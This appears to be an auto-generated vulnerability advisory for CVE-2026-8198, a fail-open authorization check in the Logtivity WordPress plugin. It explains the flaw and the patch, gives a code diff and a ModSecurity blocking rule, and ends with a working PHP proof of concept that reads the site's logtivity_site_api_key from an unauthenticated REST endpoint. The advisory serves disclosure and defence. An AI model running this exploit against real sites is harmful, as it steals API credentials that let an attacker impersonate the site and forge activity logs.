Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 8, 2026

CVE-2026-8198: Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity <= 3.3.6 – Unauthenticated Information Disclosure via REST API (logtivity)

CVE ID: CVE-2026-8198
Plugin: logtivity
Severity: Medium (CVSS 5.3)
CWE: 200
Vulnerable Version: 3.3.6
Patched Version: 3.3.7
Disclosed: May 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8198:

This vulnerability allows unauthenticated information disclosure in the Logtivity plugin for WordPress (versions up to and including 3.3.6). The core logic flaw resides in the verifyAuthorization method. An attacker can bypass authentication by omitting the Authorization header entirely, causing the method to skip all Bearer token validation and return true unconditionally. This enables access to the /wp-json/logtivity/v1/options REST API endpoint and retrieval of sensitive configuration options, including the logtivity_site_api_key.

Root Cause: The verifyAuthorization method in logtivity/Core/Services/Logtivity_Rest_Endpoints.php (lines 71-106) accepted a string parameter $authHeader. If an HTTP request lacked the Authorization header, the parameter was not passed or was empty. The validation logic checked whether a Bearer token could be parsed from $authHeader, but when no token was present it fell through to the return true statement at line 106. The method never explicitly rejected requests without a valid Authorization header: the try-catch block caught exceptions thrown during token parsing, but nothing stopped a request with no token at all from reaching the unconditional return true at the end.

Exploitation: An unauthenticated attacker crafts a GET request to the WordPress REST API endpoint /wp-json/logtivity/v1/options. By sending a request with no Authorization header, the verifyAuthorization method receives a null or empty string. The token parsing logic fails (no Bearer token present), but instead of returning an error, the method returns true. This bypasses all authentication checks, exposing plugin options in the response body. A simple cURL command or HTTP request suffices.

Patch Analysis: The patch changes the verifyAuthorization method signature to accept ?string $authHeader (allowing null). It adds an explicit check at the beginning: if ($authHeader == false), it throws new Exception('No authorization provided'). This ensures that any request without an Authorization header value (null, empty, or false) is immediately rejected. The patch also adds an else branch that throws for malformed headers (anything that is not exactly two space-separated parts beginning with Bearer). The unconditional return true is now only reached after successful Bearer token validation.
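To make the fail-open path concrete, here is an added Python model of the 3.3.6 and 3.3.7 control flow described above (it is not the plugin's code). parse_token and make_token are constructed HMAC stand-ins for Logtivity's parseToken, which the advisory does not show; the exact error returned on a bad token is likewise an assumption.

```python
import hashlib
import hmac
from typing import Optional, Union

# Constructed stand-in for parseToken(): a token is "<payload>.<hex HMAC-SHA256
# of payload keyed with the site API key>". Not Logtivity's real format.
def make_token(payload: str, api_key: str) -> str:
    sig = hmac.new(api_key.encode(), payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + sig

def parse_token(token: str, api_key: str) -> Optional[str]:
    payload, sep, sig = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(api_key.encode(), payload.encode(), hashlib.sha256).hexdigest()
    return payload if hmac.compare_digest(expected.encode(), sig.encode()) else None

def verify_vulnerable(auth_header: Optional[str], api_key: str) -> Union[bool, str]:
    # Mirrors 3.3.6: explode(' ') / count == 2 / 'Bearer' check, then a return
    # true that no branch guards. str.split(" ") behaves like PHP explode here:
    # "" and None both yield a single-element list, so the if is skipped.
    keys = (auth_header or "").split(" ")
    if len(keys) == 2 and keys[0] == "Bearer":
        if parse_token(keys[1], api_key) is None:
            return "error: invalid token"   # assumed WP_Error path (not shown in diff)
    return True  # reached for None, "", "Basic ...", a bare "Bearer", ...

def verify_fixed(auth_header: Optional[str], api_key: str) -> Union[bool, str]:
    # Mirrors 3.3.7: every non-success path raises inside the try, so the final
    # return True is reached only after a token actually validated.
    try:
        if not auth_header:                      # null or "" (PHP: == false)
            raise ValueError("No authorization provided")
        keys = auth_header.split(" ")
        if len(keys) == 2 and keys[0] == "Bearer":
            if parse_token(keys[1], api_key) is None:
                raise ValueError("Invalid token")
        else:
            raise ValueError("Malformed header")
        return True
    except ValueError as exc:
        return "error: " + str(exc)

if __name__ == "__main__":
    key = "constructed-site-api-key"
    for hdr in (None, "", "Bearer", "Basic abc", "Bearer x.y", "Bearer " + make_token("site-1", key)):
        print(repr(hdr), "->", verify_vulnerable(hdr, key), "|", verify_fixed(hdr, key))
```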

Impact: Successful exploitation allows unauthenticated attackers to read all plugin configuration options from the REST API response. The most critical exposed value is the logtivity_site_api_key, which can be used to impersonate the site in API calls to the Logtivity service. This could lead to further abuse, such as sending fraudulent activity logs or extracting additional data from the Logtivity backend. The CVSS score is 5.3 (Medium) due to the confidentiality impact and lack of authentication requirement.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/logtivity/Core/Services/Logtivity_Rest_Endpoints.php
+++ b/logtivity/Core/Services/Logtivity_Rest_Endpoints.php
@@ -71,14 +71,18 @@
     }

     /**
-     * @param string $authHeader
+     * @param ?string $authHeader
      *
      * @return true|WP_Error
      */
-    protected function verifyAuthorization(string $authHeader)
+    protected function verifyAuthorization(?string $authHeader)
     {
         if ($apikey = (new Logtivity_Options())->getApiKey()) {
             try {
+                if ($authHeader == false) {
+                    throw new Exception('No authorization provided');
+                }
+
                 $keys = explode(' ', $authHeader);
                 if (count($keys) == 2 && $keys[0] == 'Bearer') {
                     $payload = $this->parseToken($keys[1], $apikey);
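Review bot: the new guard uses a loose comparison, '$authHeader == false', which rejects null and the empty string as intended but also the literal string '0'; writing the intent out as '$authHeader === null || $authHeader === ''' is clearer and avoids surprises from PHP's comparison rules. Because the throw sits inside the existing try, the fix only holds if the catch block (outside this hunk) converts the exception into the WP_Error the docblock promises instead of letting control reach 'return true'; that catch should be checked in the same review. Note also that the whole check is nested under 'if ($apikey = ...)', so this hunk does not change what happens when no API key is configured.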
@@ -102,6 +106,9 @@
                             )
                         );
                     }
+
+                } else {
+                    throw new Exception('Malformed header');
                 }

                 return true;
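Review bot: the added else branch is what closes the fail-open path for headers that are present but not of the form 'Bearer <token>', so the 'return true' below it is now reachable only after a successful token check. The blank line inserted just before '} else {' is an unrelated whitespace change and can be dropped so the hunk carries only the behavioural fix. If the exception messages ('Malformed header', 'No authorization provided') are surfaced to the caller through the WP_Error, keep them generic as they are here and do not include the offending header value.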
--- a/logtivity/functions/functions.php
+++ b/logtivity/functions/functions.php
@@ -76,11 +76,11 @@
     }

     /**
-     * @param int $postId
+     * @param ?int $postId
      *
      * @return string
      */
-    function logtivity_get_the_title(int $postId): string
+    function logtivity_get_the_title(?int $postId): string
     {
         $wpTexturize = remove_filter('the_title', 'wptexturize');

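Review bot: widening the parameter to '?int $postId' makes logtivity_get_the_title() accept null, but the visible body does not branch on null and the docblock gains only the type, not a word on what a null id means. If null is intended to mean "the current post", say so in the docblock; if it is only there to stop a TypeError from callers that pass null, an early 'return ''' at the top of the function makes that explicit.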
--- a/logtivity/logtivity.php
+++ b/logtivity/logtivity.php
@@ -5,7 +5,7 @@
  * Plugin URI:        https://logtivity.io
  * Description:       Record activity logs and errors logs across all your WordPress sites.
  * Author:            Logtivity
- * Version:           3.3.6
+ * Version:           3.3.7
  * Text Domain:       logtivity
  * Requires at least: 4.7
  * Requires PHP:      7.4
@@ -44,7 +44,7 @@
     /**
      * @var string
      */
-    protected string $version = '3.3.6';
+    protected string $version = '3.3.7';

     /**
      * Integrations with other plugins

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
SecRule REQUEST_URI "@beginsWith /wp-json/logtivity/v1/options" \
  "id:20261994,phase:2,deny,status:403,msg:'CVE-2026-8198 - Logtivity Unauthenticated Information Disclosure',severity:'CRITICAL',tag:'CVE-2026-8198'"

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.


PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-8198 - Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity <= 3.3.6 - Unauthenticated Information Disclosure via REST API

/**
 * Exploit: Requests the /wp-json/logtivity/v1/options endpoint without Authorization header.
 * The server returns plugin configuration, including the logtivity_site_api_key.
 */

// Configure target URL (change to the vulnerable WordPress site)
$target_url = 'http://example.com';  // Replace with the target WordPress site URL

// Endpoint that exposes plugin options
$endpoint = '/wp-json/logtivity/v1/options';

$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    // No Authorization header is sent intentionally
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // Disable SSL verification for testing
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Display results
echo "[*] CVE-2026-8198 PoC - Logtivity Unauthenticated Information Disclosure\n";
echo "[*] Target: $target_url$endpoint\n";
echo "[*] HTTP Response Code: $http_code\n";

if ($http_code == 200 && !empty($response)) {
    $data = json_decode($response, true);
    if ($data !== null) {
        echo "[+] Success! Retrieved plugin options:\n";
        echo json_encode($data, JSON_PRETTY_PRINT) . "\n";

        // Highlight sensitive key
        if (isset($data['logtivity_site_api_key'])) {
            echo "\n[!] WARNING: Exposed logtivity_site_api_key: " . $data['logtivity_site_api_key'] . "\n";
        }
    } else {
        echo "[!] Response is not valid JSON. Raw response:\n$response\n";
    }
} elseif ($http_code == 403 || $http_code == 401) {
    echo "[-] The target appears patched or protected. Got HTTP $http_code.\n";
} else {
    echo "[!] Unexpected HTTP code: $http_code\n";
    echo "Response: $response\n";
}
